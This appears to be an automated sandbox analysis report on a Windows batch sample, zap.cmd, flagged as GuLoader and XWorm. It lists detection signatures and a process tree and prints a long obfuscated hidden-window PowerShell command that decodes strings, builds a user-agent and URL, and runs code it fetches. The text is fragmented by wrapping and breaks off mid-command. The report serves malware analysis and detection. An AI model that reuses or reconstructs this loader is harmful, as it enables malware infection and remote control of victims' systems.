Windows
Analysis Report
zap.cmd
Overview
General Information
Detection
GuLoader, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 7432 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\zap.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7488 cmdline:
powershell .exe -wind owstyle hi dden "$Mon ostelous = 1;$Foment ed='Sub';$ Fomented+= 'strin';$F omented+=' g';Functio n Upstair9 1($Contriv e){$Noonti de=$Contri ve.Length- $Monostelo us;For($Bo rtskaffels esmetode=5 ;$Bortskaf felsesmeto de -lt $No ontide;$Bo rtskaffels esmetode+= 6){$Savnes +=$Contriv e.$Fomente d.Invoke( $Bortskaff elsesmetod e, $Monost elous);}$S avnes;}fun ction Skiz oide($Chea nne){.($Sc rimshorn) ($Cheanne) ;}$Lagenen s=Upstair9 1 'automMS kvisoSamoa zBi.eliNuc lelMis ilS la,ea.vern /Vek.e5Unm ag. Inf 0 Aaha Spade (UnrelW Im eiTatusnE k,pedTilke oTrykkwIco nos gumm v ent.N Vill TAtion Out se1 Efte0 Numm.,hoog 0 Nabo;Skr ot UkyndWc heiriP.dde nRokad6 Un de4Diara;N anny Hus.e xSelvg6Bik se4Konsu;D agso Kor.f r Ego v Ri po:Helul1 lau2Overn1 Perio. Hov e0Genre) , ugt ReplGR emnfeCor.e cPre,okNon vaoAfpas/M yste2Diaer 0Lre r1Tri ch0Svanh0P auci1condu 0op.ak1,el ss SemitF Oilsi,asse rLu.thePri esf UoploL ittex G.de /Snr l1 Ca ud2,hole1 .pre. Lobb 0Savou ';$ Unrevengin gly166=Ups tair91 'Pe epiU Fl es ,ndisePerv r Pins- A l,oAapprig SpadeeFil, nnGenavtNo nfe ';$Sto t=Upstair9 1 'ren rhB evistKedel tNiellpFor trsFotom:S elvh/ Acke /Bjergwfil bew.oncowB illa.Ov rs s SisaeSam arnRefridE melsndven pStimea Sa ngc Bukse Bes,.Tempe cCero,oPiz zimMaste/B enaapKvilt rstangoflu ff/AppoidP rocelPrint /Va ut5Tet amCirku5O pspraReset 1SolfauOp ys ';$Deto nate=Upsta ir91 ',nth r>opbev '; $Scrimshor n=Upstair9 1 'Latkeis .igpe ball xKompr ';$ Pelagia123 ='Tordnes' ;$Udpresse de = Upsta ir91 'Cire reTredic S taihSvrsco Metr. Film m%Vildka A ,phplill,p EstradR,mi saPersptma nu.aInter% Bre,s\Rest iBGenn,eEk seklVold e SoogejU,dr arEdg,miFo lkenSkorsg St.nds Pun ctLope.iIn duslbacits HenhrtUnde .aKrgebn B igfdfarvee .opon nom ie KontsTy vep.SammeU Turbn Ta zjVeggi ap pli&R.dio& Udlov Fiks eDrypncUfo ruh CoinoA nde. Te,rt ,fslu ';Sk izoide (Up stair91 ' Ba d$Hon.r g Peril .o uto GebrbS ulfoa udsk lSypho:kun neSRigsbk, interSynka ts,emme M skr .ueleF lagegBilin iInform Mo opeCinchnH ovedtD trs e Semitrne resLandi=A rbe,(Su,re cReflemThi nodTj.ne M edit/Spkhu cTa.ul Amt sk$S adsUG rabbd Hels pW,ener Re nteDickysf lorisS gar eElderd Et lyeL,ane)m aler ');Sk izoide (Up stair91 'R a,le$Sabel g ForslSlo ppo Ge sbK o.teaGrae, l Trac:spr edBO.rejeT autnsIliad tRumvgrM r isesam enS tyrtdEfter eCrowdsuro pf=Vnget$G r geSTvang tSm leoBan .stBlo.s.P oulis Phal pGrimrlD,v isiDebittK amuf(Chest $L.cidDAde lseLydentM atteoCamer n rackaSam metSiklie page) Redo ');$Stot= $Bestrende s[0];$song tress= (Up stair91 'F ri b$ Steg glaanslLim itoStd ubI nitiaGroen lAande: Sk akS ,carpD undye Muso cBi,tekVar etl FavoeC ovendpayba = For,NSel vmeEnkepwL yrik-Sekst O D,ukb.om